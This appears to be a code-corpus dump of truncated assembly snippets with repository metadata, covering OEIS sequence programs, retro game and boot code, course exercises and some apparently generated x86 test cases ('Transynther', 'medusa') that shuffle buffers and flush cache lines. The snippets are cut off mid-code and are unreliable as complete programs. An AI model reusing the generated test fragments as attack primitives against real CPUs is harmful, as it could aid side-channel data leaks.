<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r13 push %r15 push %rcx push %rdi push %rsi lea addresses_WT_ht+0x123aa, %rsi lea addresses_WT_ht+0x672a, %rdi nop and $44679, %r13 mov $125, %rcx rep movsb nop nop xor %r13, %r13 lea addresses_WT_ht+0xb1ca, %rdi nop add $15761, %rsi mov $0x61...
src/main.asm
BlockoS/up-17
3
51491
; [todo] : allow to modify plot center ; [todo] : do some gfx ; [todo] : fix colors ; [todo] : add a 4th object .include "config.inc" .include "system.inc" .include "equ.inc" .include "macro.inc" .include "vdc.inc" .include "psg.inc" .include "ramcpy.inc" .include "interrupts...
Projetos/F-Assembly/src/nasm/mov.nasm
LiuSeeker/Z01-Coldzera
1
51492
; Elementos de Sistemas : 2018a ; <NAME> ; Hardware : Z0.1 ; ; Data : ; - Dez 2018 ; Descrição : ; - Movimentação de dados da memoria RAM ; ; RAM[0] = RAM[1] ; RAM[1] = RAM[0] ; RAM[3] = 1 leaw $0, %A movw (%A), %S leaw $1, %A movw (%A), %D movw %S, (%A) leaw $0, %A movw %D, (%A) leaw $1, %A movw %A, %S leaw $3,...
Laburi/Lab3/0-warm-ups/start.asm
DanBrezeanu/IOCLA
2
51494
%include "io.inc" section .text global CMAIN CMAIN: mov eax, 7 mov ebx, 300 add eax, ebx PRINT_UDEC 4, eax xor eax, eax ret
src/base/f64_constd.asm
rainer-erdmann/libm64
0
51495
<reponame>rainer-erdmann/libm64 ; ; FILENAME : f64_constd.asm ; ; DESCRIPTION : ; commonly used constants ; assembly module written for MASM/NASM and VS201x ; ; REMARKS: ; originally we tried to find a system to support ; MASM and NASM with the same sources ; (only a little patchwork i...
src/lib/utils/time.asm
DreamPearl/FuzzyOS
10
51496
<reponame>DreamPearl/FuzzyOS<filename>src/lib/utils/time.asm [BITS 16] global _low_sleep [SECTION .text] _low_sleep: push ebp mov ebp, esp ; callee save register push ebx ; push esi ; push edi mov ebx, [ebp + 0x08] ; (cycles) _low_sleep_int...
oeis/074/A074546.asm
neoneye/loda-programs
11
51497
; A074546: a(n) = 2^n + 8^n + 9^n. ; Submitted by <NAME>(s4) ; 3,19,149,1249,10673,91849,793649,6880249,59824193,521638729,4560527249,39970996249,351149017313,3091621650409,27274838982449,241075504216249,2134495165628033,18928981513482889,168109033806743249,1494966905749372249,13310586963664824353,118642361168369232169...
EvilSquare.asm
joaolucasp/Evil-Square
0
51498
<reponame>joaolucasp/Evil-Square ;******************************************************** ; (ORDEM DO CÓDIGO) ;******************************************************** ; 1) Inicialização ; - Main ; - Menu ; - Insere Nome ; 2) Lógica principal do jogo ; - Funções que avaliam as condições dos Level'...
oeis/007/A007704.asm
neoneye/loda-programs
11
51499
<filename>oeis/007/A007704.asm ; A007704: a(n+2) = (a(n) - 1)*a(n+1) + 1. ; Submitted by <NAME> ; 2,3,4,9,28,225,6076,1361025,8268226876,11253255215681025,93044467205527772332546876,1047053135870867396062743192203958743681025 mov $2,1 mov $4,1 lpb $0 sub $0,1 mov $3,$2 mul $2,$4 add $2,$4 mov $4,$3 lpe mov $...
programs/oeis/063/A063164.asm
neoneye/loda
22
51500
; A063164: Dimension of the space of weight 2n cusp forms for Gamma_0( 96 ). ; 9,40,72,104,136,168,200,232,264,296,328,360,392,424,456,488,520,552,584,616,648,680,712,744,776,808,840,872,904,936,968,1000,1032,1064,1096,1128,1160,1192,1224,1256,1288,1320,1352,1384,1416,1448,1480,1512,1544 mul $0,32 trn $0,1 add $0,9
Transynther/x86/_processed/NONE/_zr_/i7-8650U_0xd2.log_21829_605.asm
ljhsiun2/medusa
9
51501
.global s_prepare_buffers s_prepare_buffers: push %r13 push %r8 push %rax push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x12f8d, %rsi lea addresses_D_ht+0x1568d, %rdi nop nop nop dec %rax mov $49, %rcx rep movsw nop nop nop nop cmp $40891, %rdx lea addresses_A_ht+0x1634d, %r13 nop nop nop add %r8, %r8 mov ...
programs/oeis/060/A060806.asm
neoneye/loda
22
51503
<gh_stars>10-100 ; A060806: Denominators of special continued fraction for 2*zeta(3). ; 2,4,3,2,4,6,5,4,6,8,7,6 add $0,1 mov $1,4 lpb $1 gcd $1,$0 add $0,3 lpe div $0,2
Transynther/x86/_processed/AVXALIGN/_st_/i3-7100_9_0x84_notsx.log_21829_772.asm
ljhsiun2/medusa
9
51504
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r8 push %rbp push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x197c9, %rsi lea addresses_D_ht+0x10113, %rdi nop nop cmp $49746, %rdx mov $22, %rcx rep movsl nop and $17280, %rsi lea addresses_normal_ht+0x12429, %rbp nop nop nop nop nop an...
oeis/028/A028361.asm
neoneye/loda-programs
11
51505
<reponame>neoneye/loda-programs ; A028361: Number of totally isotropic spaces of index n in orthogonal geometry of dimension 2n. ; Submitted by <NAME>(s1.) ; 1,2,6,30,270,4590,151470,9845550,1270075950,326409519150,167448083323950,171634285407048750,351678650799042888750,1440827432323678715208750,1180469915302789971370...
cc4x86/tests/regressive/asm_listings/float__optimize_noinline.asm
artyompal/C-compiler
4
51506
<reponame>artyompal/C-compiler .686 .model flat .xmm .data ___unnamed_float_0 dd 00h public ___unnamed_float_0 align 16 ___unnamed_float4_1 dd 080000000h, 00h, 00h, 00h public ___unnamed_float4_1 ___unnamed_float_2 dd 03a83126fh public ___unnamed_float_2 ___unnamed_float...
programs/oeis/118/A118618.asm
neoneye/loda
22
51507
<reponame>neoneye/loda ; A118618: Start with 1 and repeatedly reverse the digits and add 32 to get the next term. ; 1,33,65,88,120,53,67,108,833,370,105,533,367,795,629,958,891,230,64,78,119,943,381,215,544,477,806,640,78,119,943,381,215,544,477,806,640,78,119,943,381,215,544,477,806,640,78,119,943,381,215,544,477,806,...
src/affichageContigueInverse.asm
Amayas29/TraitementAdnAsm
0
51508
<reponame>Amayas29/TraitementAdnAsm<gh_stars>0 ; afficher la chaine adn avec coloration des chaines contigue inverse sans affichage des tirets Data segment ADN db "GCAACCGCCAACGCGTATGA-GCGCGGATGCGCGCGGATGC-TTACGCGTAAAATGCGCATT-CTTCCGCACATCCCGCTACT-GCACGATGGTACCGGTCGCC-CCTGCCATGGTGTGATCCGC-CCGCTACTGCCGTCATCGCC-A...
samples/sprites/scroller/coin.asm
boldowa/GIEPY
8
51510
;------------------------------------------------- ; custom scroller code for debug ;------------------------------------------------- init: %putdebug("CScrollerInit") phb phk plb jsr CSI plb rtl main: %putdebug("CScrollerMain") phb phk plb jsr CSM plb rtl CSI: lda.b #2 sta.b $19 ...
loaders_patches_etc/screen_2put.asm
alexanderbazhenoff/zx-spectrum-various
0
51511
<filename>loaders_patches_etc/screen_2put.asm STARTADR EQU #6000 ORG STARTADR LD HL,SCREEN+#1800+#180 LD DE,#5980 LD B,#C OUT_1 PUSH BC PUSH DE PUSH HL EI HALT LD HL,SCREEN+#58 REG_HL1 EQU $-2 LD DE,#4860 REG_DE1 EQU $-2 ...
programs/oeis/085/A085473.asm
karttu/loda
1
51512
; A085473: a(n) = 6*n^2 + 3*n + 1. ; 1,10,31,64,109,166,235,316,409,514,631,760,901,1054,1219,1396,1585,1786,1999,2224,2461,2710,2971,3244,3529,3826,4135,4456,4789,5134,5491,5860,6241,6634,7039,7456,7885,8326,8779,9244,9721,10210,10711,11224,11749,12286,12835,13396,13969,14554,15151,15760,16381,17014,17659,18316,18985,...
oeis/289/A289745.asm
neoneye/loda-programs
11
51513
<gh_stars>10-100 ; A289745: Coefficients in expansion of -q*E'_10 where E_10 is the Eisenstein Series (A013974). ; 264,270864,15589728,277365792,2578126320,15995060928,74573467584,284022573120,920557851048,2645157604320,6847480097568,16379004749184,36394641851568,76512377741184,152243515448640,290839114879104,532222389...
Transynther/x86/_processed/AVXALIGN/_st_/i3-7100_9_0xca_notsx.log_21829_1668.asm
ljhsiun2/medusa
9
51514
<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r14 push %r9 push %rbx push %rcx push %rsi lea addresses_WC_ht+0x23e8, %r9 nop nop nop nop dec %r12 movups (%r9), %xmm6 vpextrq $0, %xmm6, %r14 nop nop nop nop and %r9, %r9 lea addresses_normal_ht+0x67a8, %rsi nop nop nop nop nop dec ...
Transynther/x86/_processed/NC/_zr_/i3-7100_9_0x84_notsx.log_21829_2653.asm
ljhsiun2/medusa
9
51515
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %rax push %rbx push %rcx push %rdi push %rdx push %rsi lea addresses_A_ht+0x13503, %rsi lea addresses_D_ht+0x745b, %rdi xor $3337, %rax mov $29, %rcx rep movsl nop xor %rbx, %rbx lea addresses_normal_ht+0x1b277, %rsi lea addresses_WT_ht+0x1095b, %rdi...
oeis/008/A008748.asm
neoneye/loda-programs
11
51516
<reponame>neoneye/loda-programs ; A008748: Expansion of (1 + x^5) / ((1-x) * (1-x^2) * (1-x^3)) in powers of x. ; 1,1,2,3,4,6,8,10,13,16,19,23,27,31,36,41,46,52,58,64,71,78,85,93,101,109,118,127,136,146,156,166,177,188,199,211,223,235,248,261,274,288,302,316,331,346,361,377,393,409,426,443,460,478,496,514,533,552,571,5...
Transynther/x86/_processed/AVXALIGN/_zr_/i7-8650U_0xd2.log_1999_580.asm
ljhsiun2/medusa
9
51518
.global s_prepare_buffers s_prepare_buffers: push %r12 push %r8 push %r9 push %rbp push %rbx push %rcx push %rdi push %rsi lea addresses_WT_ht+0x346b, %rsi lea addresses_WC_ht+0x1c373, %rdi clflush (%rdi) nop and %r12, %r12 mov $15, %rcx rep movsl nop nop nop dec %r12 lea addresses_normal_ht+0x3273, %r8 clflush (%r8) n...
programs/oeis/276/A276867.asm
karttu/loda
0
51519
<filename>programs/oeis/276/A276867.asm ; A276867: First differences of the Beatty sequence A003231 for 2 + tau, where tau = golden ratio = (1 + sqrt(5))/2. ; 3,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,4,3,4,3,4,4,3,4,3,4,4,3,4,4...
data/maps/objects/UndergroundPathRoute7.asm
opiter09/ASM-Machina
1
51520
UndergroundPathRoute7_Object: db $a ; border block def_warps warp 3, 7, 4, LAST_MAP warp 4, 7, 4, LAST_MAP warp 4, 4, 0, UNDERGROUND_PATH_WEST_EAST def_signs def_objects object SPRITE_MIDDLE_AGED_MAN, 2, 4, STAY, NONE, 1 ; person def_warps_to UNDERGROUND_PATH_ROUTE_7
reverse/stac/boot/disasm/stac_boot_block_2.asm
fcatrin/a8tools
3
51521
<filename>reverse/stac/boot/disasm/stac_boot_block_2.asm<gh_stars>1-10 ; BLOCK 2 stac_boot.xex org $0400 sei ldy TRIG3 WAIT bne WAIT sty NMIEN sty SRC sty DST dey sty PO...
oeis/212/A212975.asm
neoneye/loda-programs
11
51522
; A212975: Number of (w,x,y) with all terms in {0,...,n} and even range. ; Submitted by <NAME> ; 1,2,15,28,65,102,175,248,369,490,671,852,1105,1358,1695,2032,2465,2898,3439,3980,4641,5302,6095,6888,7825,8762,9855,10948,12209,13470,14911,16352,17985,19618,21455,23292,25345,27398,29679,31960 add $0,1 mov $1,$0 pow $0,2 ...